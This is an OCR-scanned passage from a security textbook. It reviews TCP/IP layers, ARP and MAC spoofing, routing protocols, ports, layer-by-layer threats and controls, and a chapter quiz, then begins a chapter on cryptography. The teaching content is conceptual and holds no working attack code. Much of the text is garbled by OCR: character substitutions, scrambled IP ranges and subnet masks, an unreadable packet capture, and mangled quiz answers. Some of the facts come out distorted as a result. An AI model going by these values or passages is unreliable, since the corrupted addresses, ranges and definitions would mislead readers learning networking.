the ARP — a command at the command line on a system. An example of this command is shown here: NOTE C:\>arp -a Interface: 192.168.123.114 — 0x4 You can permanently maintain or statically add an ARP entry by using the arp -s <ip address> cMAC address> command. By permanently adding an entry, the future request will speed up Internet Address Physical Address Type 192.168.123.121 0(M!l-SS-12-26-bf> dynamic 142.1 68.1 2 3.1 30 QO-23-4d-7O-af-20 dynamic 192.168.123.254 00-1 c- 1 0-f5-6 l-9c dynamic because the broadcast process does not have to occur due to the request being cached. Add the string J ‘pub” to the end of the command,, and that are accepted as valid. The switch then “thinks” that the attacker is really the other system, and redirects traffic to that address. For example, an attacker can provide falsi lied ARP responses You can use ARP to hypass the features in a switch. the system will act as an ARP server, answering ARP requests even for an fP that it does not possess. CHAPTER 2 TCP/IP Review 35 NOTE Although many types of frames can be presenter handled at this layer of the TCP/IP model, Ethernet is by far the most common. Ethernet frames have several characteristics; one is using a MAC address for addressing at this leveL Also included at this layer are legacy protocols known as Serial Line Interface Protocol (SLIP) and Foint-to-Foint Protocol (PPF). Although bolh provide the ability to transmit data over serial links, PPP is more robust than SLIP and has therefore displaced SLIP in many implementations. For the most part, SLIP is seen only in very specific environments and deployments, such as older networks, Physical Layer Threats .Several security threats exist at this layer. Before security professionals can understand how to defend against them, they must first understand the attacks. Some common threats found at this layer include the following.: Spoofing MAC addresses — Hackers can use a wide variety of programs to spoof MAC addresses or even use the features built into an operating system to change their MAC. By spoofing MAC addresses, attackers can bypass 802.11 wireless controls or when switches are used to control traffic, by locking ports to specific MAC addresses. ■ Wiretapping — The act of monitoring Internet and telephone conversations covertly by a third party. In essence, this attack requires you to tap into a cable for a wired network, but can involve listening in on a wireless network, • Interception — Packet sniffers are one of the primary means of intercepting network traffic. ■ Eavesdropping — The unauthorized capture and reading of network traffic. Physical Layer Controls In order to protect against physical layer attacks some simple countermeasures can be employed: • Fiber cable — Choice of transmission media can make a tremendous difference in the types of attacks that can be carried out and how difficult said attacks may he. For example, liber is more secure than the w T ired alternatives and also more secure than wireless transmission methods. • Wired Equivalent Privacy (WEP) WW was an early attempt to add security to wireless networking. Although it is true that wireless networks can offer a level of security, this security is considered to be weak by today’s standards. WEP has been largely replaced in favor of WFA and WPA2. In practice it should be used only in noncritical deployments, if at all. 36 PART 1 Hacker Techniques and Tools Wi-Fi Protected Access (WPA} — WPA was introduced as a more secure and more robust overall alternative to WEP and has proven to be more secure than WEP in practice. • Wi-Fi Protected Access 2 (WPA2) — WPA 2 is an upgrade that adds several improvements over WPA, including encryption protocols such as Advanced Encryption Standard (AES] and Temporal Key Integrity Protocol fTKIP) as welt a s be tier key m a n a ge m en I over W PA , • Point-to-point Tunneling Protocol (PPTPJ — PPTP is widely used for virtual private networks (VPNs), PPTP is composed ol two components: the transport that maintains the virtual connection and the encryption that ensures uonlkientialily. • Challenge Handshake Authentication Protocol (CHAP) — CHAP is an improvement over previous authentication protocols such as Password Authentication Protocol (PAP), in which passwords were sent in cleartext. Internetwork Layer The next layer is the internetworking layer, which maps to Layer I of the OSI reference model. Internetworking Layer Equipment The primary piece of equipment located at the internetwork layer is the router. Routers differ from switches found at the lower layers in that they direct traffic using logical addresses as opposed to the physical addresses used by switches. Furthermore^ routers are meant to move traffic between different networks to form paths to direct traffic between multiple networks. Routers allow packets to flow from the source device’s network to the destination device’s network. Points to remember about routers include the following: FIGURE 2-6 IP header. Bit Number: 0 16 31 (P Header 1 Data (TCP segment] Version II IL Differentiated Services Total Length Identification Flags Fragment Offset Time to live Protocol Header Checksum Source IP address Destination IP address Options Padding Data CHAPTER 2 TCP/IP Review 37 • Does not forward broEidcast packets • Forwards multicast packets • Has highest latency • Has most flexibility • ■ Makes forwarding decisions on basis of destination IP address. • Req u ire s co n li gu rat ion Routers are also known as edge devices because of their placement at the point where multiple networks come together Routers rely on items known as routing protocols to ensure that traffic gets to the correct location. is addressed to. Once this is located > the router can consult ei routing table to determine where to send the information. A router can be configured either statically or dynamically, depending on the require- ments in a given situation. Static routing is a routing table that has been ere ei led by ei network Eidministrator who is knowledgeable about the layout of the network and enters this in form tit ion manually into the routing table. Static routing is used mainly on small networks; it quickly loses its utility on tEirger networks because the manunl updates would take increasing amounts of effort to keep up to date. Dynamic routing represents the more commonly used option in networks and routing tables, Dynamic routing uses a combination of factors to update it automatically and the same factors to determine at any time where to send the information in question. Dynamic routing protocols include: RIP P Border Gateway Protocol £BCPL Interior Gateway Routing Protocol (IC1RP), and OSPF. Within the protocols marked as dynamic routing are two subcategories known as distance vector and link-state routing. The basic methodology of a distance vector protocol is to make a decision on what is the best route by determining the shortest path. The shortest path is commonly calculated by what are known as hops. RIP is an example of a distance vector routing protocol. RIP has several issues from a security standpoint: • Broadcasts all data • is su b jec t to rou t e po i so n i n g ■ Has no authentic ation Might not choose the best path Routing Protocols The aforementioned routing protocols determine the best path to send traffic at a point in time. The two best examples of routing protocols are Routing Information Protocol (RIP) and Open Shortest Path First (OSPF). Routers are optimized to perform the vital function of routing traffic between networks and ensuring that traffic reaches its intended destination. When receiving a packet, a router examines the header of the packet (see Figure 2-6} with specific emphasis on the address the packet Routing tables contain information that allows a router to quickly look up the best path that can be used to send the information. Routing tables are updated on a regular schedule in order to ensure that information contained within them is accurate and accounts for changing network conditions. PART 1 Hacker Techniques and Tools A hop count describes the number of routers that a packet must pass through, or traverse, to reach its destination. Each time a packet passes through a router one hop is made, and in routing terms a hop is added to the hop count. RIP is the most common routing protocol that uses a hop count as its primary routing metric. Hop counts have some disadvantages over protocols that use distance vectors in that the path with the lowest number of hops may not be the optimum route. The lower hop count path may have considerable less bandwidth than the higher hop count route. Link state calculates the best path to a target network by one or more metrics such as delay, speed, or bandwidth. Once this path has been determined, the router will inform other routers what it has discovered. Link state routing is considered more flexible and robust than distance vector routing protocols, OSPF is the most common link state routing protocol and is used as a replacement for RIP in most large-scale deployments. OSPF was developed in the mid-1980s to overcome the problems associated with RIP Although RIP works well when networks are small in size, it rapidly loses its advantages when the network scales up in size. OSPF has several built-in advantages over RIP that Include the following: • Security • The use of IP multicasts to send out router updates • • I’n limited hop count Better support for load balancing • Fast convergence Internetwork Layer Protocols The most important protocol in the TCP/IP suite is IP because of its central role in addresses and routing. It is a routable protocol that has the role of making a best effort at delivering information, IP organizes data into a packet* prepares it for delivery, and places a source and destination address on the packet. Additionally, IP is responsible for adding information known as the Time to Live {TTL) to a packet. The goal of aTTL is to keep packets from traversing the network forever. If the recipient cannot be found, rather than traveling the network forever, the packet can eventually be discarded. Taking a closer look at the important IP address, there are some details that start to emerge that reveal how routing and other functions lake place. One part of the IP address refers to the network, and the other refers to the host. In Itiyman’s terms* the network is equivalent to the street in a postal address, and the host is the house number on a given street. Combined, they allow you to communicate with any network and any host in the world that is connected to the Internet. CHAPTER 2 TCP/IP Review 39 1 1 1 addresses are laid out in a dotted decimal notation format that divides the address up into four groups of numbers representing ft bits apiece. IPv4 lays out addresses into Ei four-decimal number formal that is separated by decimal points. Each of these decimal numbers is 1 byte long to allow numbers to range from 0-2 5 5. You can tell the class of tin JJ’ mUiri’ss hy I unking ai liu- lirsi octet. An example of IPv4 addressing js shown here: Class IP address begins with A 1-126 E 127-191 C 192-223 D 224-2 39 E 240-2 55 Each of the classes is designed to divide up the number of networks and hosts with larger or smaller networks being possible depending on the class. A class A network offered the fewest networks with the greatest number of hosts with Class C offering the opposite. Class D and E are used for different purposes that this chapter will not discuss. A number of addresses have been reserved for private use. These addresses are n on rou table, which means that manufactures of routers program them not to propagate network traffic from these address ranges onto the Internet. Traffic within these address ranges routes normally. Address ranges set aside as no n rout able, private addresses, including their respective subnet mask, are: NOTE Each section of an IP address separated by a decimal is commonly known as an octet, which comes from the binary notation used to represent it. Any number present in an IP address (0-255) can be represented by a sequence of eight ones and zeros. Class Address range A B C in. 0.0.0-10.255.255.255.255 172,16,0,0-17231*255,255 192.168.0.0-192,168,255,255 Default subnet mask 255;0.0,0 255,255.0.(1 255.255,255.0 NOTE A good example of an attack against an IP is what is known as a teardrop attack. Malformed fragments can crash or hang older operating systems that have not been patched. Specifically in this attack, a packet is transmitted to a system that is larger than the system can handlej resulting in a crash. Many home routers use a default address of 192.1 68. 0. 1 or 1 92.1 hH. 1,1. This means that a home network is no n rou table “right out of the box, 1 ‘ which is a very desirable security feature. Also located at the internetwork layer is the Internet Control Message Protocol (I CMP), which was designed for network diagnostics and to report logical errors. TCP/IP environments must support ICMP because it is an essential service tor nel work management. ICMP provides error reporting and diagnostics, and ICMP messages follow a basic format. The first byte of an ICMP header indicates the type of ICMP message. The byte following contains the code for each particular type of ICMP. Tight of the most common ICMP types are shown here: 40 PA RT 1 H ac ke r Techn iq ties and Too I s IC MP type Code Function 0/8 0 Echo Response/ Request (Ping) I 0-15 Destination I ” n re ei enable 4 0 Source Quench 5 0-3 Redirect 11 0-1 Time Exceeded 12 0 Parameter Eault 13/14 0 Tim est amp Request/ Response 17/1S 0 Subnet Mask Request/ Response NOTE Ping gets its name f rom the distinctive “pinging” noise made by sonar in ships and submarines to locate other vessels that may be lurking nearby. A ping from a sonar device bounces a sound off a hull of a ship as an echo, letting the sender know where the lurker happens to be. The most common tool used by network administrators associated with ICMP is a ping h which is useful in determining whether a host is up. It is also useful for attackers bee ti use they can use it to enumerate a system {it can help the hacker determine whether a computer is online I, Internetwork Layer Threats One threat that will be discussed more in depth later in this text is known as a sniffer [also commonly referred to as a protocol analyzer). Sniffers are hardware- or softw r are-based devices that tire used to view and /or record traffic that flows over the network. Sniffers are useful and problematic at the same time because network traffic that might include sensitive data can be viewed through the use of a sniffer It is not uncommon for corporate IT departments to specifically deny the use of sniffers except by those specifically authorized to use them. Sniffers pose a real risk in that a less- than -ethical individual might intercept a password or other sensitive information in clear text and use it later for some unauthorized purpose. In order to realize the full potential of a sniffer, certain conditions have to be in place; most important is the ability for a network card to be put into promiscuous mode. In other words, the card can view all traffic moving past it rather than just the traffic destined for it. There are programs to accomplish this for Linux and Windows users. Linux users can download libpeapat http’J fsourceforge. net /projects/ hhpcapL Windows users need to install the vvinpeap library, available at http://wwwAvinpaip.org. Just remember that promiscuous mode allows a sniffer to capture any packet it can see, not just packets addressed to the device. Next, you have to install a sniffer. The most widely used sniffer is known as Wireshark, Wireshark has gained popularity because it is free, easy to use, and it works as well as or better than most commercial sniffing tools. Wireshark, just like other sniffers, comprises three displays or window’s. To get an idea of w T hat the display looks like, look at Figure 2-7. CHAPTER 2 TCP/IP Review 1941 36. 50OU3 16S, 123.114 l*t3 36. 5Q34S7 1944 36.504170 194 5 3.6. 50421 S 19?, 163, 123.114 162. 165. 123.114 192.168.123.114 74.12i.15S.1 01 192,168.123.254 DM5 19M6S.123.254 mi 1. 16S. 123. 254 DW5 4 519 * http [SYN standard query ^ Standard query A standard query a 1947 36. 543969 192. 163. 123 . 254 iLTi:K^iiMf im ifinnni 1949 36.5 50293 192. 16S. 123 , 254 1950 36.551395 192.103,123.11: 1951 34, 5 53370 162,16$. 123*234

1952 36.563213 74.12S.95,95

192.168.123.114

192,168.123.114
192.168.123. 254
192,169,123,114
192.168.123,114

1954 36. 5691Z7
195 5 36. 569736

1956 36. SS2S67

1957 36. 610664

l[*2,T5eriTS;2S4
192.163. 123.254
209. St.i2S.93
74,121.15 5.101

i i. • itindard que ry rc

standard query A

OWS Standard query rs

C«£ standard query A

ws standard query re

TCP http 4 515 [FIK,

1 $2/168- 123.11-4 192.168.123.114 1. 1£S. 123.114 192.168.123.114 r i- TCP TCP Standard qusry rg standard query re http > 4 514 [AC hi] http. > 4 519 [syn. i*i Frame 194B (B5 bytes on ^Ire, 85 bytes captured) w Ethernet II, Src: cUco-Lt_11;c* :3c C00:la: 70:11 :c4:3c>, est: ci sco-Li_f 5 ; 61; 9c (00:1c: it] inter net protocol, srci 192. 168. 123. 114 C192.168.123.114X est: 192. 163. 123. 254 (192.16 si User Datagram Protocol, Src Port: 56956 C569S6) J Dst Port: damain CJ3:> t Domain Name System (query) 0000 0010 0020 0030 0040 0050 ■ I – I f – -.1 00 ■ .1 00 47 90 lb 00 00 SO 11 7b f § St 7C 00 35 00 33 00 00 00 DO 00 00 Oc 67 74 %f 73 OS 62 6C 6f 6? 00 00 01 DO 01 70 11 C4 3C 08 00 45 00 31 C9 cO aS ?b 72 cO aS Fb ‘1 2 «9 at 01 00 00 01 flf 6f 67 6c 65 70 6S «f 1. 70 6f ?4 03 63 6f 6d ■ r r ■ 4 ■ in P n ■ ^ ■ ■ E ■ .G 1… ■{[*. . ^..1.5.3 ,e g cctjlepho tns. blog spct.cmi FIGURE 2-7 Wire shark. At the top of the figure, you can see a number of packets that have been captured. Tn the middle of the figure, you can .see the one packet that has been highlighted for review. At the bottom of the tigure. you can see the contents of the individual frame. If you want to learn more about sniffers. Wires hark is a good place to start. It can be downloaded from w ww. wi res hark. org. Internetwork Layer Controls Moving up the TCP/IP stack, the following controls are useful at the internetwork layer. • IPSec — The most widely used standard for protecting JP datagrams is IPSec. IPSec can be at or above the internetwork layer. IPSec can be used by applications and is transparent to end users, IPSec addresses two important security problems with data in transit: keeping the data coniidential and maintaining its integrity. Packet filters — Packet filtering is configured through access control lists (ACLs), ACLs enable rule sets to be built that will allow or block traffic based on header information. As traffic passes through the router, each packet is compared with the rule set, and a decision is made as to whether the packet will be permitted or denied. Network address translation (NAT) — Originally developed to address the growing need for IP addresses (discussed in Request for Comments [RFC] 1631), MAT can be used to translate between private and public addresses. Private D? addresses are those that are considered unrou table. Being unroutable means that public Internet routers will not route traffic to or from addresses in these ranges. A small measure of security is added by using NAT. 42 PART 1 Hacker Techniques and Tools Host-to-Host Layer The ho s Mo – host layer provides end-to-end delivery. This layer segments the data and tidds a checksum in order to properly validate data to ensure that it has not been corrupted. A decision must be made here to send the data with TCP or UDP, depending on the speciiic application. HosMo-Host Layer Protocols This primary job of the host-to-host transport layer is to facilitate end-lo-end communi- cation. This layer is often referred to as the transport layer. The following sections describe the two protocols at this layer: • TCP • UDP TCP provides reliable data delivery services and is a connect ion -oriented protocol. TCP provides reliable data delivery, flow control, sequencing, and a means to handle startups and shutdowns. TCP also uses a three-step handshake to start a session. During the dEila-transiiiission process, TCP guarantees delivery of data by using sequence and ac kno wled gm en t numbers. At the completion of the da la -transmission process, TCP performs u four-step shutdown thai gracefully concludes the session. The startup sequence is shown in Figure 2-8. TCP has li lixcd packet structure (see Figure 2-9). Port scanners can tweak TCP flags and send them in packets that should not normally exist in an attempt to elicit a response from a targeted server, Like TCP, UDP belongs to the host-to-host layer, Unlike TCP, I. DP is a connectionless transport service, UDP does not have startup, shutdown, or any handshaking processes like those performed by TCP. Because there is no handshake with UDP, it is harder to scan and enumerate. Although this makes it less reliable, it does offer the benefit of speed, UDP is optimized for applications that require fast delivery and are not sensitive to packet toss, UDP is used by services such as Domain Name Service (DNS), FIGURE 2-8 TCP startup and shutdown. Request for connection © SYN SYN-ACK Client Response Server Connection established CHAPTER 2 TCP/IP Review 43 Bit Number: 0 16 TCP Header \ Source Port Destination Port Sequence number Acknowledgment Header length Reserved u R G p S 5 ¥ Checksum Options Data Sliding -window size Urgent pointer Padding 31 FIGURE 2-9 TCP frame struct ure. Host-to-Host Layer Threats Some of the most common host-to-host layer attacks arc shown here: • Port scanning — A technique in which a message is sent to each port, one at a time. By examining the response, the attacker can determine weaknesses in the applications being probed and determine what to attack. Session hijack — A type of attack in which the attacker places himself between the victim and the server. The attack is made possible because authentication typically is done only at the start of a TCP session. • SYN attack— A SYN attack is a distributed denial of service (DDoS) attack in which the attacker sends a succession of SYN packets with a spoofed return address to a targeted destination IP device, but does not send the last ACK packet to acknowledge and confirm receipt, Eventually, the target system runs out of open connections and cannot accept any new legitimate connection requests. Host-to -Host Layer Controls Although the host-to-host layer is where you find TCP and IJDP, you need to remember that these protocols are not designed for security. Their goal is reliable or fast delivery. Listed here are some host-to- host security protocols: Secure Sockets Layer (SSL) — SSL is considered application independent and can be used with Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Telnet to run on top of it transparently. SSL uses RSA public key cryptography • Transport Layer Security (TLS) — TLS is an upgrade to SSL and is backward compatible, but they do not intemperate. TLS, much like SSL, is designed to be application independent. 44 PA RT 1 H ac ke r Techn iq ties and Too I s • SOCKS — Another security protocol developed and established by Internet standard RFC 192 fi. It allows client-server applications to work behind a firewall and utilize their security features. Secure RFC (S/RPC) — Adds an additional layer of security onto the RPC process by adding Data Encryption Standard (DPS) encryption Application Layer This section examines the application layer, which maps to OSI Layers 5, 6, and 7. The application layer internets with applications that need to gain Etc cess to network services. Application Layer Services There are many application layer services present at this layer; however, not all are of importance to the security professional Focus on the services that have the greatest potential for abuse and misuse and therefore represent the greatest threat. Services are assigned a port number. There are 65,5 3 5 ports: they are divided into well-known ports (0-102 3 ), registered ports (1024-49151 ), and dynamic ports (49152 -65 5 35). Although there are hundreds of ports and corresponding applicEitions in practice, fewer than J DO are in common use and of these only a handful will be encountered on a regular basis. The most common of these are shown in Table 2-2. These are some of the ports that a hacker would first look for on a victim’s computer systems. You should practice the deny-all principle and enable just those ports that are needed instead of memorizing each port and deciding whether to block it or not. Simply put. you should block everything and allow only what is needed. If a port is not being used, and deny-all is the practice, it will already be closed. Going back to the earlier issue of TCP/IP being designed when more trust was given to networks, all applications are not created equally. Although some, such as Secure Shell (SSII), are designed to be secure alternatives to Telnet, you might encounter the less secure options in practice. The following list discusses the operation and security issues of some of the common applications: DNS — DNS operates on port 53 and performs address translation. DNS serves a critical function in that it converts fully qualified domain names (TO DM si into numeric TP addresses or IP addresses into FQDNs. DNS uses HDP and TCP, FTP — FTP is a TCP service that operates on ports 20 and 21 . This applicEition is used to move files from one computer to another. Port 20 is used for the data stream and transfers the data between the client and the server. Port 21 is the control stream and is used to pass commands between the client and the PTP server. NOTE Every firewall is different in respect to configuration, but by default most firewalls have most if not all their default ports and services disabled, Et is up to you, as the security professional, to determine what you need enabled to make the network usable and enable just those features you need to function. CHAPTER 2 KfVIP Review 45 • HTTP — HTTP is a TCP service that operates on port Hi). HTTP uses a request response protocol in which a client sends a request and a .server sends a response. Because HTTP is generally on Web servers, and Web servers tire a very public and exposed asset, the protocol is very commonly exploited by all sorts of threats, including malware, • Simple Network Management Protocol (SNMP) — SNMP is a UDP service and operates on ports 161 and 162. Some of the security problems that plague SNMP Eire caused because community strings (which act as a pseudo-password) can be passed as cleartext and the default community strings (public/ private) are well known. SNMP version 3 is the most current and it offers encryption. • Telnet — Telnet is a TCP service that operates on port 2 3, Telnet enables a client at one site to establish a session with a host at another site. The program passes the information typed at the client’s keyboard to the host computer system. Telnet sends data in the clear. TABLE 2-2 Computer ports, services, and protocols. PORT 1 \J 1 \ 1 SERVICE J l ..W V IVL PROTOCOL 21 FTP 1 IE TCP TCP 1 \— 1 23 jrp 1 ^_ 1 25 SMTP TCP 1 S— 1 DNS TCP/UDP 67/68 DHCP UDP 69 TFTP UDP 79 Finger TCP SO HTTP TCP 88 Kerberos UDP 110 POPS TCP 111 SUNRPC TCP/UDP 135 MSRPC TCP/UDP 139 NB Session TCP/UDP 161 SNMP UDP 162 SNMP Trap UDP 3S9 LDAP TCP 443 SSL TCP 445 SMB over IP TCP/UDP 1433 MS-SQL TCP PA RT 1 H ac ke r Teehn iq ues a n d Too I s • Simple Mail Transfer Protocol (SMTP) — This application is a TCP service that operates on port 25, It is designed for the exchange of electronic mail between networked systems. Spoofing and spa mm in g are two of the vulnerabilities associated with SMTP. Trivial File Transfer Protocol (TFTP) IT TP operates on port 69. Tt also requires no authentication, which could pose a big security risk. It is used to transfer router configuration files and by cable companies to configure cable modems. Application Layer Threats Although numerous application layer threats exist, listing all of them is unnecessary. Some of the more common are briefly listed here to serve as an Introduction to in-depth discussions in later chapters: • Mai ware — Software developed for the purpose of doing harm. Examples of ma I ware include the following: ■ Tro j an — A prog ra m t h at d oes s o m et h in g u nd o c u me n ted th a 1 1 he prog r a m m e r or designer intended, but the end user would not approve of if he or she knew about it Spy ware — Any software application that covertly gathers in form tit ion about a user’s activity and reports such to a third party • Virus — A computer program with the capability to generate copies of itself and spread file-to-file. Because viruses usually require the interaction of an Individual, they spread very slowly. Viruses can have a wide range of effects, including irritating the user or destroying data. Worm — A self- replica ling program that spreads by inserting copies of itself into other executable codes, programs, or documents. Worms replicate from system to system (instead of file-to-iile), and thus spread much more rapidly than viruses. Some worms can Hood a network with traffic and result in a Do S attack by consuming bandwidth and other resources, • DoS — Occurs when an attacker consumes the resources on a target computer for things It was not intended to be doing, thus preventing normal use of network resources for legitimate purposes Examples of DoS attacks include the following: • DoS attack — Although these a tt ticks are known by different names (for example, smiuT. SVX Hood, loniJ urea n el work denial LAXDj, and i Wiggle l . each i>. designed only to disrupt service. • DDoS attack — Similar to DoS. except the attack is launched from multiple distributed agent IP devices. Examples of I!) DoS programs include Tribal Flood Network (TFN), TFN2K, Shaft, and Trinoo. • Botnets — A term used to describe robot-controlled workstations that are part of a collection of other robot-controlled workstations. These devices can be used for DoS or to flood systems with spam. • CHAPTER 2 TCP/IP Review 47 r Virus Scanners SSHSET Application PGP S/MIME Kerberos Secure Coding TACACS Physical TCP/IP Model SSL TLS SOCKS S/RPC 1 P S Packet Filters PPTP L2TP e c CHAP WEP NAT Fiber FIGURE 2-10 TCP/IP model and each layer’s controls. Controls and Countermeasures Application Layer Controls Following are some examples of application layer controls. An overview of the controls discussed for each layer of the TCP/IP model can be seen in Figure 2-10. Some Eip plication layer software controls include the following: • Mai ware scanners — Anti-ma I ware programs can use one or more techniques to check files and applications for viruses. These programs use a variety of techniques to scan and detect viruses. Ma I ware detection software has changed from an add-on tool to a must-have system requirement. • SSH — A secure application layer program that has security features built in. SSI I sends no data in cleartext. Usern a me/pas swords are encrypted. SSIIv2 offers even greater protection. Pretty Good Privacy (PGP) — PGP uses a public-private key system and offers strong protection fore-mail. • Secure/Multipurpose Internet Mail Extension (S/MIME) Secures e-mail by using X.SG9 certificates for authentication. S/MIME works in one of two modes: signed and enveloped. 48 PART 1 Hacker Techniques and Tools ■- CHAPTER SUMMARY This chapter examined some qf the more commonly used applications and protocols used by TCP/IP. The purpose of this review was to better understand how the protocols work. Understanding the underlying mechanics and functioning of a protocol allows the security professional to betler defend against attacks. Knowing the mechanics of li protocol also assists in the understanding of the attacks themselves. As a security professional, it is of vital importance to be not just reactive, but proactive. Thinking about how an attacker could leverage or exploit holes present In systems is an invaluable tool in your toolbox. The knowledge presented in this chapter will emerge in different forms and in different places throughout the rest of tins ivxi . KEY CONCEPTS AND TERMS Address Resolution Protocol Institute of Electrical and Router Serial Line Interface Protocol [ARP) Deny-all principle Domain Name Service {DNS) Encapsulation Firewall Flow control Electronics Engineers (IEEE) fayer 2 Tunneling Protocol (SLIP) Sniffer Subnet mask SYN attack Transport Layer Security (TLS) User Datagram Protocol (UDP) (L2TP) Media access control (MACJ Frame address Physical/network equipment Reverse Address Resolution Protocol fRARP) CHAPTER 2 TCP/IP Review 49 CHAPTER 2 ASSESSMENT 1. What is the networking layer of the OSl reference model responsible for/ A, Physical layer connectivity B. Routing and delivery of IP packets C Formatting the data D. Physical framing E. None of the above 1. Which of the following is not an attribute of OSPF? A. Security B. The use of IP multlcasts to send out router updates C No limitation for hop count D. Subject to route poisoning 1. Which of [he following makes I J DP harder to scan for? A. Low overhead B. Lack of startup and shutdown C Speed 11 Versatility 1. Which of the following best describes how ICMP is used? A, Packet delivery B. Error detection and correction C Logical errors and diagnostics D. IP pac ket dc livery 1. The most common type of ICMP message Is • Which of the following statements most closc-h esses I Ik- difference iji mini ml: and routable protocols? • A. IP is a routing protocol, whereas RIP Ls a mutable protocol. B. OSPF is a routing protocol, whereas IP Is a routable protocol. C. B(iP Is used as a routable protocol, ‘.vhereus Rli’ is ; : online iL;jl oL. \X Roll [able prulocols iire used to delinc [ he best path from point A to point B> while routing |H”oloi o\> iwv useil :e 1i-;uls|jpj 1 ihc du\i. 1. WhcLl is another way used lo describe Ethernet: A. Collision detection B. Sends traffic to all nodes on a hub C. CSMA/CD D. All of the above &. Botnets are used to bypass the functionality of a switch. A. True B. False 1. What is a security vulnerability found in RIP? A. Slow convergence B. Travels only 5 fs hops C. No authentication D. Distance vector 1. Which of [lie following best describes the role of LP? A. (Guaranteed delivery B, Best effort at delivery L\ l-sUil:l:shes sesshni^ h meiiii*- of a handshake process ll is considered an OSl Layer 2 protocol Cryptographic Concepts N THE FIELD OF INFORMATION SECURITY, there are a handful of topics that serve as the foundation to understanding other technologies. One of these foundations is cryptography, which is a body of knowledge that deals with the protection and preservation of information. Cryptography is one of the techniques woven into the very fabric of other technologies including IP Security (IPSec), certificates, digital signatures, and many others. Common examples of cryptography in use include Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA), and 802.11 i (WPA2), not to mention Secure Sockets Layer (SSL), just to name a few. With a firm grasp of cryptography in hand, you can fully understand other technologies and techniques — and their proper applications. Cryptography provides information protection in the areas of confidentiality and integrity as well as providing the additional advantages of non repudiation. If applied properly, cryptography can provide robust protection that would not otherwise be possiole. Confidentiality is :he ab::i:y to pro “.eel information from unauthorized disclosure; information cannot be viewed by those not authorized access. Integrity is provided through the cryptographic mechanism known as hashing, Nonrepudiation provides the ability to prevent a party from denying the origin of the information in question. You can use cryptographic techniques to provide these same solutions to information both in transit and in storage. From another perspective, it is important to understand cryptography in order to properly evaluate systems. Understanding the different types of cryptographic algorithms can make evaluating software and services easier by providing insight into how something is supposed to work. Furthermore, understanding cryptography allows the ethical hacker to understand how to properly evaluate systems to look for weaknesses and better understand threats. Password cracking, authentication systems testing, traffic sniffing, and secure wireless networks are all mechanisms that use encryption and. are common mechanisms that are tested by ethical hackers on behalf of clients. This chapter covers the following topics and concepts: ■ What the basics of cryptography are • What symmetric encryption is ■ What asymmetric encryption is • What the purpose of public key infrastructure (PKI) is What hashing is What common cryptographic systems are What cryp tana lysis is Chapter 3 Goals When you complete this chapter, you will be able to: Describe the purpose of cryptography • Describe the usage of symmetric encryption ■ List the advantages and disadvantages of symmetric encryption • Detail components of symmetric algorithms such as key size, block size r and usage • Show the importance of asymmetric encryption and how it provides integrity and non repudiation • Describe common asymmetric algorithms • ■ Identify the purpose and usage of hashing algorithms • Explain the concept of collisions • State the purpose of digital signatures • ■ Explain the usage of PKI • Identify common cryptographic systems • Describe basic password attack methods • 52 PA RT 1 H ac ke r Techn iq ues and Too I s ^ NOTE Many forms of encryption have been used throughout history. In World War II, the German Enigma and Japanese JN-25 systems were used widely (and broken by Allied cryptographers). Cryptographic Basics Cryptography provides eiii invaluable service to security by providing a means to safeguard in for ma Lion a gains! unauthorised disclosure, and also provides a means to detect modification of information. Cryptography additionally provides the ability to have confidence as to the true origin of information through what is known as no n repudiation. Cryptography is not a new technique, and understanding some of the older techniques may assist in understanding the process. Several forms of cryptography appear throughout history: for example. Julius Caesar used a cipher to communicate sensitive information with his generals. The cipher works by means of what is known as a key shift, in which each character in a message is moved the same number of spaces to the left or right. I Caesar used a key of 3, meaning A encrypted to 13. B encrypted to E, and so on.) We call ciphers that are similar to what he used “Caesar ciphers.” While simple in practice and easily broken today, the cipher preserved confidentiality for two reasons: illiteracy was high outside the Roman Empire, and anyone who was literate might assume that the message was in another language. Indeed only those who knew what they were looking at could revcr.se the process and, presumably, these people were limited to Caesar and his generals, As one can see. encryption, while not a new technique, still has the same function to protect information from all but the authorized parties. Understanding the information-hiding or confidentiality aspect of encryption requires that one understand several terms and concepts starting with codes and ciphers. Codes and ciphers have a history of being used interchangeably, but this is not correct. Specifically, codes are a mechanism that relies on the usage of complete words or phrases, whereas ciphers utilize single letters to perform encryption. Some common forms of ciphers include substitution (the Caesar cipher is a type of substitution), stream, and block. Many forms and types of ciphers and codes exist, but each one tends to share the goal of confidentiality of information. In today’s world, ciphers and codes lire used in cryptographic systems to protect e-mail, transmitted data, stored information, personal information, and e-commerce transactions. The next area that is commonly associated with and involves encryption is authenti- cation. Authentication is the process of positively identifying a party as a user, computer, or service. Authentication is being used more often in the software industry to ensure that applications software and items such as software drivers are actually genuine. In the case of software-based items, authentication is used in the form of a digital sign ature to show that a piece of so Ilia hit \ < iimuirie. Authentication of drivers plays a vital role in system stability because having a driver signed and verified as coming from the actual vendor and not from some other unknown (and un trusted) source assures that the code in question has met certain standards. Authentication in the context of electronic messaging provides the ability to validate that a message has come from a source that is known and can be trusted. With messaging authentication in place, you can have a system where messages CHAPTER 3 Cryptographic Concepts that can no I. be authenticated are not accepted as being genuine. Finally, encryption plays ei prominent role in the actual authentication process. Consider that the information used to authenticate an identity such as a PIN or password needs to be kept secret to prevent disclosure to unauthorised parties. For example, through the use of hashing, passwords don’t need to be transmitted over a network (the hashes are instead), and they can be compared with what is previously known without sending the password. Because the hashes would already he associated with a known user, if the two hashes match (the one transmitted and the one stored and associated with the user), then the user can be said to be validated . Two well-known examples or protocols in which encryption can play an important role are File Transfer Protocol (FTP) and Telnet. Both were designed at a time when security threats weren’t considered as they are today. In practice FTP and Telnet do not include any form of encryption or protection, which means that the ii u E hen 13ca lion and data transmission processes are all easily viewable by software such as packet sniffers. Through the introduction of additional mechanisms that can provide encryption where these protocols cannot, it is possible to overcome the limitations of the protocol by encrypting or hashing the passw r ord prior to transmission, thereby keeping the password secret during transmission. An even better solution to the challenges posed by having FTP and Telnet is to use Secure .Shell (SSI I) instead, which encrypts the logon and transmission of information. Virtual private netw T orks (VPNs) also use authenticEition, but instead of a deartext username and password, Lhey use special tunneling protocols that leverage the power of encryption to provide security for data. VPNs can also leverage other techniques that rely on cryptographic techniques such as digital certificates and digital signatures to more accurately identify the user and protect the authentication process from spoofing. Integrity is another widely used and important role of cryptography. Integrity is the ability to verify that information has not been altered and has remained in the form originally intended by the creator. Consider the potential impact of a receiving a piece of information that has been altered at some point between the sender and receiver — if such information were altered to say yes instead of no or up 